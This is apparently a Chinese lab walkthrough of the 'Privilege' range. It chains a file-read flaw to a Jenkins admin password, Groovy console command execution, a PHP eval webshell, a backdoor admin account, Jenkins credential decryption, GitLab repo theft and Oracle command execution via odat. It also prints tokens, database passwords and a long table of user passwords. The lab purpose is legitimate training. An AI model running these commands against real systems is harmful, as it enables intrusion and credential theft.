春秋云境-Privilege

Launch! Launch!


Jenkins exploitation

.\fscan64.exe -h 121.89.197.147 -p 1-65535

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 121.89.197.147 is alive
[*] Icmp alive hosts len is: 1
121.89.197.147:80 open
121.89.197.147:135 open
121.89.197.147:139 open
121.89.197.147:3306 open
121.89.197.147:3389 open
121.89.197.147:8080 open
121.89.197.147:15774 open
121.89.197.147:47001 open
121.89.197.147:49664 open
121.89.197.147:49665 open
121.89.197.147:49666 open
121.89.197.147:49667 open
121.89.197.147:49669 open
121.89.197.147:49670 open
121.89.197.147:49678 open
121.89.197.147:49677 open
[*] alive ports len is: 16
start vulscan
已完成 0/16 [-] mysql 121.89.197.147:3306 root 123456 Error 1130: Host '125.86.164.172' is not allowed to connect to this MySQL server
[*] NetInfo:
[*]121.89.197.147
[->]XR-JENKINS
[->]172.22.14.7
[*] WebTitle: http://121.89.197.147 code:200 len:54732 title:XR SHOP
[*] WebTitle: http://121.89.197.147:47001 code:404 len:315 title:Not Found
[*] WebTitle: http://121.89.197.147:8080 code:403 len:548 title:None
[+] http://121.89.197.147/www.zip poc-yaml-backup-file

I only ran the scan once, so some of the ports may be false positives, but it did turn up a backup file at /www.zip.

Port 80, XR SHOP, is a site built on WordPress.

Port 8080 is the Jenkins login page.

No weak passwords worked on either of them.

Going by the hint, the chain should be: backup file -> arbitrary file read -> read the Jenkins initial admin password -> get a shell.

Downloaded /www.zip and had a look. There are too many files to read by hand, so I used Seay to look for usable vulnerable spots.

/tools/content-log.php, that direct?

Verify it:

http://121.89.197.147/tools/content-log.php?logfile=C:\Windows\System32\drivers\etc\hosts

It runs with fairly high privileges and can read system files directly.

According to the hint, the Jenkins configuration directory is C:\ProgramData\Jenkins\.jenkins

So read the initial password from C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword

http://121.89.197.147/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword

admin
510235cf43f14e83b88a9f144199655b

Log in to the backend with that username and password.

Find the Script Console under Manage Jenkins.

I remember an older Jenkins I hit before also allowed command execution from here, though that one was on Linux.

It runs as SYSTEM, so first write a webshell:

println "cmd.exe /c echo ^<?php eval(\$_POST[1]);?^> > C:\\phpstudy_pro\\WWW\\1.php".execute().text

Then create a user for remote access.

Working directly over a remote desktop session is much more convenient:

println "net user hey qwer1234! /add".execute().text
println "net localgroup administrators hey /add".execute().text

flag1

Internal network reconnaissance and proxy setup

C:\Users\hey>ipconfig

Windows IP 配置


以太网适配器 以太网:

连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::203f:e515:d906:8e03%3
IPv4 地址 . . . . . . . . . . . . : 172.22.14.7
子网掩码 . . . . . . . . . . . . : 255.255.0.0
默认网关. . . . . . . . . . . . . : 172.22.255.253

C:\Users\hey>systeminfo

主机名: XR-JENKINS
OS 名称: Microsoft Windows Server 2019 Datacenter
OS 版本: 10.0.17763 暂缺 Build 17763
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人:
注册的组织: Aliyun
产品 ID: 00430-00000-00000-AA295
初始安装日期: 2022/12/25, 14:05:31
系统启动时间: 2024/3/6, 19:11:04
系统制造商: Alibaba Cloud
系统型号: Alibaba Cloud ECS
系统类型: x64-based PC
处理器: 安装了 1 个处理器。
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2500 Mhz
BIOS 版本: SeaBIOS 449e491, 2014/4/1
Windows 目录: C:\Windows
系统目录: C:\Windows\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (UTC+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 3,950 MB
可用的物理内存: 1,711 MB
虚拟内存: 最大值: 5,358 MB
虚拟内存: 可用: 2,879 MB
虚拟内存: 使用中: 2,479 MB
页面文件位置: C:\pagefile.sys
: WORKGROUP
登录服务器: \\XR-JENKINS
修补程序: 安装了 7 个修补程序。
[01]: KB5020615
[02]: KB4470788
[03]: KB4486153
[04]: KB4486155
[05]: KB5005112
[06]: KB5019966
[07]: KB5020374
网卡: 安装了 1 个 NIC。
[01]: Red Hat VirtIO Ethernet Adapter
连接名: 以太网
启用 DHCP:
DHCP 服务器: 172.22.255.253
IP 地址
[01]: 172.22.14.7
[02]: fe80::203f:e515:d906:8e03
Hyper-V 要求: 已检测到虚拟机监控程序。将不显示 Hyper-V 所需的功能。

The domain field shows WORKGROUP, so scan the internal subnet first:

.\fscan64.exe -h 172.22.14.7/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.14.7 is alive
(icmp) Target 172.22.14.11 is alive
(icmp) Target 172.22.14.16 is alive
(icmp) Target 172.22.14.31 is alive
(icmp) Target 172.22.14.46 is alive
[*] Icmp alive hosts len is: 5
172.22.14.11:445 open
172.22.14.16:22 open
172.22.14.7:3306 open
172.22.14.31:1521 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.31:139 open
172.22.14.11:139 open
172.22.14.46:135 open
172.22.14.7:139 open
172.22.14.31:135 open
172.22.14.11:135 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.11:88 open
172.22.14.16:8060 open
172.22.14.7:8080 open
172.22.14.16:9094 open
[*] alive ports len is: 22
start vulscan
[*] NetInfo:
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] NetInfo:
[*]172.22.14.46
[->]XR-0923
[->]172.22.14.46
[*] NetInfo:
[*]172.22.14.31
[->]XR-ORACLE
[->]172.22.14.31
[*] NetInfo:
[*]172.22.14.11
[->]XR-DC
[->]172.22.14.11
[*] WebTitle: http://172.22.14.7:8080 code:403 len:548 title:None
[*] WebTitle: http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] NetBios: 172.22.14.31 WORKGROUP\XR-ORACLE
[*] NetBios: 172.22.14.46 XIAORANG\XR-0923
[*] NetBios: 172.22.14.11 [+]DC XIAORANG\XR-DC
[*] WebTitle: http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.14.7 code:200 len:54603 title:XR SHOP
[*] WebTitle: http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle: http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
[+] http://172.22.14.7/www.zip poc-yaml-backup-file
已完成 20/22 [-] ssh 172.22.14.16:22 root Admin@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none], no supported methods remain
已完成 22/22
[*] 扫描结束,耗时: 2m8.1840413s

Analysis:

172.22.14.31    WORKGROUP\XR-ORACLE    possibly an Oracle database
172.22.14.46    XIAORANG\XR-0923       IIS Windows Server
172.22.14.11    domain controller      XIAORANG\XR-DC
172.22.14.7     already compromised
172.22.14.16    GitLab
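The host table above (and the one for the external scan earlier) was compiled by reading the fscan output by eye. As an added example that is not part of the writeup, here is a small Python parser that builds the same per-host summary from raw fscan 1.8.x text: open ports, the hostname from the NetInfo/NetBios lines, workgroup or domain, the `[+]DC` flag, web titles, and a service hint from well-known ports. The regexes, the port-to-service table and the sample (a subset of the scan lines quoted above) are my own assumptions about the output format, not fscan's own code.

```python
import re
from collections import defaultdict

IP = r"\d{1,3}(?:\.\d{1,3}){3}"
OPEN_RE = re.compile(rf"^({IP}):(\d+) open$")
NETINFO_IP_RE = re.compile(rf"^\[\*\]({IP})$")            # "[*]172.22.14.7"
NETINFO_NAME_RE = re.compile(rf"^\[->\](?!{IP}$)(\S+)$")  # "[->]XR-JENKINS", not the IP echo
NETBIOS_RE = re.compile(rf"^\[\*\] NetBios: ({IP}) (\[\+\]DC )?([^\\\s]+)\\(\S+)$")
WEBTITLE_RE = re.compile(
    rf"^\[\*\] WebTitle: https?://({IP})(?::(\d+))?\S* code:(\d+) len:\d+ title:(.*)$"
)

# Well-known ports seen in this lab, mapped to a service guess (assumption, not fscan's table).
PORT_HINTS = {22: "ssh", 80: "http", 88: "kerberos (DC?)", 445: "smb",
              1521: "oracle listener", 3306: "mysql", 3389: "rdp", 8080: "http-alt"}

def _new_host():
    return {"ports": set(), "name": None, "domain": None, "dc": False, "web": []}

def parse_fscan(text):
    """Return {ip: {ports, name, domain, dc, web}} from raw fscan output."""
    hosts = defaultdict(_new_host)
    current = None  # IP of the NetInfo block currently being read
    for line in text.splitlines():
        line = line.strip()
        if m := OPEN_RE.match(line):
            hosts[m[1]]["ports"].add(int(m[2]))
        elif m := NETINFO_IP_RE.match(line):
            current = m[1]
        elif (m := NETINFO_NAME_RE.match(line)) and current:
            hosts[current]["name"] = hosts[current]["name"] or m[1]
        elif m := NETBIOS_RE.match(line):
            h = hosts[m[1]]
            h["domain"], h["name"] = m[3], m[4]
            h["dc"] = h["dc"] or m[2] is not None
        elif m := WEBTITLE_RE.match(line):
            hosts[m[1]]["web"].append((int(m[2] or 80), int(m[3]), m[4]))
    return dict(hosts)

def role_hints(host):
    """Service guesses for one host from its ports, web titles and the DC flag."""
    hints = [PORT_HINTS[p] for p in sorted(host["ports"]) if p in PORT_HINTS]
    hints += [f"gitlab (title: {t})" for _, _, t in host["web"] if "gitlab" in t.lower()]
    if host["dc"]:
        hints.append("domain controller (fscan [+]DC flag)")
    return hints

def summarize(text):
    """One (ip, name, domain, hints) row per host, sorted by address."""
    hosts = parse_fscan(text)
    order = sorted(hosts, key=lambda ip: tuple(int(o) for o in ip.split(".")))
    return [(ip, hosts[ip]["name"] or "?", hosts[ip]["domain"] or "?",
             ", ".join(role_hints(hosts[ip]))) for ip in order]

# Constructed sample: a subset of the fscan lines from the internal scan above.
SAMPLE = """\
(icmp) Target 172.22.14.7 is alive
172.22.14.11:445 open
172.22.14.16:22 open
172.22.14.7:3306 open
172.22.14.31:1521 open
172.22.14.31:445 open
172.22.14.31:139 open
172.22.14.31:135 open
172.22.14.11:88 open
172.22.14.16:80 open
172.22.14.7:8080 open
[*] NetInfo:
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] NetBios: 172.22.14.31 WORKGROUP\\XR-ORACLE
[*] NetBios: 172.22.14.11 [+]DC XIAORANG\\XR-DC
[*] WebTitle: http://172.22.14.7:8080 code:403 len:548 title:None
[*] WebTitle: http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
"""

if __name__ == "__main__":
    for row in summarize(SAMPLE):
        print("  ".join(row))
```

Feed it the full scan text and the rows come out in address order; the NetBios line wins over NetInfo for the hostname because it also carries the workgroup/domain, which is what separates XR-ORACLE (WORKGROUP) from the XIAORANG members.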

Setting up a proxy

There seems to be no AV on the remote desktop, so uploading tools and working from there is just as convenient; a proxy is not really needed, but I'll set one up anyway.

./frps -c ./frps.toml     // VPS
.\frpc.exe -c frpc.toml // victim host

Using the GitLab API token

The challenge hint says: the administrator configured GitLab for Jenkins; try to obtain the GitLab API token and ultimately the sensitive repositories in GitLab. After obtaining the sensitive information, try to connect to the Oracle database and take control of the ORACLE server.

Found the API token in C:/ProgramData/Jenkins/.jenkins/credentials.xml:

<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="credentials@1214.v1de940103927">
  <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
    <entry>
      <com.cloudbees.plugins.credentials.domains.Domain>
        <specifications/>
      </com.cloudbees.plugins.credentials.domains.Domain>
      <java.util.concurrent.CopyOnWriteArrayList>
        <com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="gitlab-plugin@1.6.0">
          <scope>GLOBAL</scope>
          <id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
          <description></description>
          <apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
        </com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
      </java.util.concurrent.CopyOnWriteArrayList>
    </entry>
  </domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>

Then go back to the Jenkins script console to decrypt it:

println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())

Decrypted: glpat-7kD_qLH2PiQv_ywB9hz2

Reading other writeups, you can also run Groovy directly in the console to dump every stored credential in decrypted form:

com.cloudbees.plugins.credentials.SystemCredentialsProvider.getInstance().getCredentials().forEach{
    it.properties.each { prop, val ->
        println(prop + ' = "' + val + '"')
    }
    println("-----------------------")
}

Then list the GitLab projects via the API:

proxychains4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"
[{
"id": 6,
"description": null,
"name": "Internal Secret",
"name_with_namespace": "XRLAB / Internal Secret",
"path": "internal-secret",
"path_with_namespace": "xrlab/internal-secret",
"created_at": "2022-12-25T08:30:12.362Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/internal-secret.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T08:30:12.362Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
}
}, {
"id": 4,
"description": null,
"name": "XRAdmin",
"name_with_namespace": "XRLAB / XRAdmin",
"path": "xradmin",
"path_with_namespace": "xrlab/xradmin",
"created_at": "2022-12-25T07:48:16.751Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xradmin.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2023-05-30T10:27:31.762Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
}
}, {
"id": 3,
"description": null,
"name": "Awenode",
"name_with_namespace": "XRLAB / Awenode",
"path": "awenode",
"path_with_namespace": "xrlab/awenode",
"created_at": "2022-12-25T07:46:43.635Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/awenode.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:46:43.635Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
}
}, {
"id": 2,
"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
"name": "XRWiki",
"name_with_namespace": "XRLAB / XRWiki",
"path": "xrwiki",
"path_with_namespace": "xrlab/xrwiki",
"created_at": "2022-12-25T07:44:18.589Z",
"default_branch": "master",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:xrlab/xrwiki.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
"avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:44:18.589Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
}
}, {
"id": 1,
"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
"name": "Monitoring",
"name_with_namespace": "GitLab Instance / Monitoring",
"path": "Monitoring",
"path_with_namespace": "gitlab-instance-23352f48/Monitoring",
"created_at": "2022-12-25T07:18:20.914Z",
"default_branch": "main",
"tag_list": [],
"topics": [],
"ssh_url_to_repo": "git@gitlab.xiaorang.lab:gitlab-instance-23352f48/Monitoring.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
"web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:18:20.914Z",
"namespace": {
"id": 2,
"name": "GitLab Instance",
"path": "gitlab-instance-23352f48",
"kind": "group",
"full_path": "gitlab-instance-23352f48",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
}
}]

The following projects exist, but only the first two are useful; the others come with GitLab by default.

xrlab/internal-secret
xrlab/xradmin
xrlab/awenode
xrlab/xrwiki
gitlab-instance-23352f48/Monitoring

Clone them:

proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/internal-secret.git
proxychains4 git clone http://gitlab.xiaorang.lab:glpat-7kD_qLH2PiQv_ywB9hz2@172.22.14.16/xrlab/xradmin.git

The internal-secret project contains a credentials.txt file listing the username and password for each machine; it looks like password spraying is the intended next step.

Found the database credentials in application-druid.yml:

url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf

Oracle DBA RCE

Connecting with Navicat throws an error, which I resolved by following this article: "Oracle ORA-28547: connection to server failed, probable Oracle Net admin error, troubleshooting" (CSDN blog).

When connecting, select DBA as the role.

Navicat's bundled configuration can only connect to Oracle 10 databases, but this is an Oracle 11 database.

select * from dba_role_privs where granted_role='DBA';

Since xradmin holds the DBA role, odat can execute OS commands directly, so skip Navicat and just add an account for remote access:

proxychains4 ./odat-libc2.17-x86_64 dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user hey qwer1234! /add'
proxychains4 ./odat-libc2.17-x86_64 dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators hey /add'

SeRestorePrivilege privilege escalation

Back to the credentials.txt file in the internal-secret project:

Machine | Username | Password
-----------------------------
XR-0776 | huangmin | 8I5VZpg4Mf
XR-0777 | zhangrong | cHY716Zauf
XR-0778 | liying | JKe5IFEasb
XR-0779 | zhaoli | bYaT8pnoQ7
XR-0780 | zhangyan | EyHJTxY5LA
XR-0781 | zhoujing | 7AJXxfY9Oi
XR-0782 | liuying | 3Q29kxupsU
XR-0783 | wanghao | APQ5Sxvd0n
XR-0784 | wangqiang | WebaBkv4lh
XR-0785 | wanglu | 5CtYa9XmZW
XR-0786 | zhaoyong | FbquAxEwJf
XR-0787 | zhangli | pCuPEbYl8B
XR-0788 | wangning | JL6By9mUDP
XR-0789 | wangyu | WVIrHMljRh
XR-0790 | yangli | hNuHLKxU6m
XR-0791 | zhangqian | e7RSK4wnLV
XR-0792 | lishuai | ymjieu5FzP
XR-0793 | yangliu | QXfZmcSV97
XR-0794 | wangying | 51Je2P8iFB
XR-0795 | chenjie | jFGv3tKSp9
XR-0796 | yangyong | wafYnDCJxv
XR-0797 | lipeng | YCo0bBQrNJ
XR-0798 | lixin | pT1DUgbflC
XR-0799 | liukai | EgywVJW2Un
XR-0800 | machao | H1XqljRYgD
XR-0801 | lijia | vxjUbe1K7V
XR-0802 | zhangping | lPq6LmHh8x
XR-0803 | zhanghui | Z4mjpzt281
XR-0804 | zhangwen | hT0wp2xKdJ
XR-0805 | wangmin | 6ykzR2AuKh
XR-0806 | chenlin | QPEFJ7c8io
XR-0807 | chenjuan | kAsC9UvBfP
XR-0808 | lining | 4QgT65dbMz
XR-0809 | wangwei | MZ3ehq8Gd0
XR-0810 | zhangnan | 1uXL5jvblq
XR-0811 | wangxia | K04W23mUXx
XR-0812 | zhangyu | CiycwuGxHE
XR-0813 | chenchen | q5GPSZv2rB
XR-0814 | wangbing | tHgvbCRj5F
XR-0815 | lilin | bTrGF97RMJ
XR-0816 | zhangling | T5HfUYwh8n
XR-0817 | chenling | 2MH0sXUvnN
XR-0818 | yangmei | jJ4iKS6WMN
XR-0819 | liuqiang | LRptNZWUAh
XR-0820 | lihong | TXbnO76oNg
XR-0821 | lilei | qvaN1rK0AY
XR-0822 | wanghuan | X3iFcTyOmv
XR-0823 | wangxin | ADSMd4l5w8
XR-0824 | yangping | QRiej9HcTK
XR-0825 | lijie | Az9OG4ibCH
XR-0826 | wangqian | PB9KAtTjWC
XR-0827 | liping | R8qFTAQV63
XR-0828 | liuhui | YOzAaNq8Io
XR-0829 | zhangming | 4p08EcFzsm
XR-0830 | zhangying | MHPwUoQImi
XR-0831 | libo | E23ztI9LUe
XR-0832 | liuqin | bsmrRkLoqT
XR-0833 | wangchao | ACz5Q73oUa
XR-0834 | liuli | x2XuZsIJtm
XR-0835 | yangwei | wKYHlDXkmq
XR-0836 | wangyan | yg1HXxWu2s
XR-0837 | wangjian | zUo7vHb8OY
XR-0838 | zhangbin | r8m01CcS4f
XR-0839 | wangli | Im8WSeGlEf
XR-0840 | wangdan | qIvBQ0p1kP
XR-0841 | liuxia | B69KWIACtq
XR-0842 | zhangrui | u2KVeb683m
XR-0843 | wangdong | rEtTIU8BLD
XR-0844 | wangting | Jkunlz29eg
XR-0845 | zhangjian | Zyp9lDorhg
XR-0846 | wanghua | 74ksE5BmHc
XR-0847 | liyan | rEOAslLQR0
XR-0848 | liufeng | LUZcuoFxfG
XR-0849 | zhangbo | XHvBV4ujQc
XR-0850 | liuming | jBWDJfZ93c
XR-0851 | liujia | PmpXKckTs9
XR-0852 | chentao | 2sHutpN8iY
XR-0853 | zhangting | e3wg2nIu7Z
XR-0854 | liushuai | iY2fbz1HQB
XR-0855 | lijing | MCIcl6sgNQ
XR-0856 | wangbin | msxNSIlj8G
XR-0857 | lijian | IUilEz5SYQ
XR-0858 | zhouyong | v36CT5ILMU
XR-0859 | liudan | AKkCpEnLvx
XR-0860 | yangbin | yE9G3VSnsO
XR-0861 | liupeng | ryLTgeDZhI
XR-0862 | chenjun | kngEGACsQh
XR-0863 | wangbo | FbK6fsiPBn
XR-0864 | libin | b2BcHWCEYO
XR-0865 | zhaowei | 2hrJ64tgqG
XR-0866 | lijuan | XBkgKysUbz
XR-0867 | chenchao | oDU7vPZ84B
XR-0868 | wangming | vKpV13DemJ
XR-0869 | lifang | TbzE3tWF4y
XR-0870 | wangtao | yaxpPWRkiB
XR-0871 | liufang | Fde8Gt1bmq
XR-0872 | litao | VCurpwXIA4
XR-0873 | yangling | PInqR2xBK0
XR-0874 | yangxue | sxjQ75mLzK
XR-0875 | liubin | sWeharCdXE
XR-0876 | yangyang | FZ6r8LMA5U
XR-0877 | xuwei | 0B4Du1h7zV
XR-0878 | chenyong | Folq5iOnej
XR-0879 | yangbo | ZlIs9LYNeW
XR-0880 | zhanghua | oFHU1Z0VKM
XR-0881 | zhaomin | IafjNO3Hib
XR-0882 | chenping | qJQXKkVpFP
XR-0883 | zhanglei | 61kcLxqTiu
XR-0884 | zhangliang | j5Ls2Hub3i
XR-0885 | zhangtao | 5PAcQGy461
XR-0886 | zhangxue | eY3DrwsijQ
XR-0887 | liqian | 7jHvompSTN
XR-0888 | liwei | wjTFE8x0IY
XR-0889 | chenbin | sm7lR86Y4p
XR-0890 | zhangyun | mWzkyDJMRq
XR-0891 | wangxue | pfR5VoUZO1
XR-0892 | zhouwei | oN3Sd60khs
XR-0893 | likai | QwzvK1qm4j
XR-0894 | gaofeng | 5fQvjFU1uN
XR-0895 | wanglei | 1apTkBr9Y6
XR-0896 | lijun | cVBI8nsCwA
XR-0897 | liuwei | 0VBecvT4Au
XR-0898 | wanggang | rCGB4wFh5X
XR-0899 | liuping | UQaX9DBLbJ
XR-0900 | zhangning | SLqJiM1QTy
XR-0901 | libing | ZgXlj6VKPu
XR-0902 | zhangchao | tSBpVjiYh8
XR-0903 | zhangxia | hRlYXkqceC
XR-0904 | limin | s3I4lFctoE
XR-0905 | liulei | V5rsKkeWSJ
XR-0906 | wangling | lL7QinBydG
XR-0907 | zhangfei | jO1xtU6hP4
XR-0908 | chenlong | wKDFqcOfmp
XR-0909 | liufei | 36BjIW1VgH
XR-0910 | chenli | eYiOh4jWUq
XR-0911 | chenyan | oad8rYbwfs
XR-0912 | chenpeng | US2Am1iIk8
XR-0913 | wangrui | DTZ1xgz3cS
XR-0914 | zhangfeng | SHxNByGuwX
XR-0915 | yanglin | riwW3UkI4o
XR-0916 | liutao | HFVUOZEPpL
XR-0917 | liyong | wZyEuVvOjQ
XR-0918 | wangna | 6i840wmbv1
XR-0919 | wangjuan | fJv4PKASzb
XR-0920 | wanghui | 7qT4wcMSGv
XR-0921 | lilong | pHTkl3dEIU
XR-0922 | lili | 0LRQxIuV9t
XR-0923 | zhangshuai | wSbEajHzZs
XR-0924 | zhangfan | TrfCMlmY59
XR-0925 | liujing | gtOslNQDB2
XR-0926 | liuqian | tqX9DVLTHI
XR-0927 | yangfang | sa18OlILmB
XR-0928 | chenqiang | VEKnlwgFpU
XR-0929 | liqiang | pZbj7z9H8v
XR-0930 | yangjun | pqahdFK2PZ
XR-0931 | chenbo | 78SmUu1gfi
XR-0932 | zhangyong | CS4sx0MvUF
XR-0933 | wangliang | 4vV6UjqzOQ
XR-0934 | wangxu | UfTgi40DV9
XR-0935 | chenhua | lWS207vdOf
XR-0936 | zhouli | DuMiQOb0qK
XR-0937 | liubing | NXwAreabgd
XR-0938 | zhaojing | Ru3Gen8YBM
XR-0939 | yangyan | IHrpmeTNfl
XR-0940 | chenfang | d3nUGRgs24
XR-0941 | zhanghao | Yu0ZbEKFIT
XR-0942 | wangyun | 0rwTmed8SJ
XR-0943 | zhangxin | 8vPF5hzoAa
XR-0944 | zhangwei | YLwUpHNS6X
XR-0945 | wangping | FqhfMozSXp
XR-0946 | wangkai | D04bXHTKpc
XR-0947 | liuchang | Ue60X3sGrS
XR-0948 | lixue | CHbgqOTeIc
XR-0949 | lina | rwanydljVu
XR-0950 | liwen | edc0M7yvQu
XR-0951 | liming | yziSjWBoCH
XR-0952 | liling | wmdjRaIBAS
XR-0953 | chenwei | xcqN5VPbCM
XR-0954 | lihao | iUpmDYS2CL
XR-0955 | wanglin | 5pgFojT6wI
XR-0956 | zhanglin | x7OgKTdhyQ
XR-0957 | xumin | QuMKRHoB3U
XR-0958 | liuyan | g1wN7ydrLh
XR-0959 | zhangmin | e9XBQqEtPp
XR-0960 | zhangqiang | vcKRYUDOGL
XR-0961 | yangchao | MhUkEeWYBF
XR-0962 | yanghua | fZUCSaoiIt
XR-0963 | ligang | CdgFjNf1Mk
XR-0964 | liuxin | knHhJmBwEM
XR-0965 | liuhuan | pZSHNhjkq9
XR-0966 | lifeng | jRAkFxLT5e
XR-0967 | liugang | YA2mVzSs5K
XR-0968 | yangtao | 4b32TQLP6y
XR-0969 | liuhao | 0EPZ6Fyism
XR-0970 | lichao | ultLQzWN34
XR-0971 | yanghong | Ig2BNLMuWf
XR-0972 | chenhong | Q4eOjNym6S
XR-0973 | sunwei | drjUYgi3T0
XR-0974 | zhanghong | sRkmQIB5La
XR-0975 | zhangdan | b2HoSCuhaM
XR-0976 | liumin | FPRm6W7wGs
XR-0977 | wangmei | yq7MVcj4se
XR-0978 | zhangjing | WR4Ef16FiU
XR-0979 | liujun | DEwYySf6Ni
XR-0980 | wangyong | h9XMZiEv0g
XR-0981 | huangyong | DgoIyPSTHZ
XR-0982 | lixiang | TAoPcpiF3g
XR-0983 | zhoujie | YrlB2gMuxF
XR-0984 | liuchao | ijaDY4Ilr3
XR-0985 | liuna | 6xn2jo17SE
XR-0986 | wangjing | 65MhGVI0oL
XR-0987 | liuling | MjmN9ahSLR
XR-0988 | chenjing | ha23yfqcPg
XR-0989 | wangqin | MsdW85gzFL
XR-0990 | wanglong | O3oD1lscAK
XR-0991 | chenlei | 3vtAJqzrYB
XR-0992 | yangjie | fuTBeq6z51
XR-0993 | zhangjun | l02GAEUHq9
XR-0994 | yangming | N3bYUqfenc
XR-0995 | zhangmei | S7DG5bgXtN
XR-0996 | wangrong | 2BPmaxilGq
XR-0997 | zhangpeng | BHOqDmCXMn
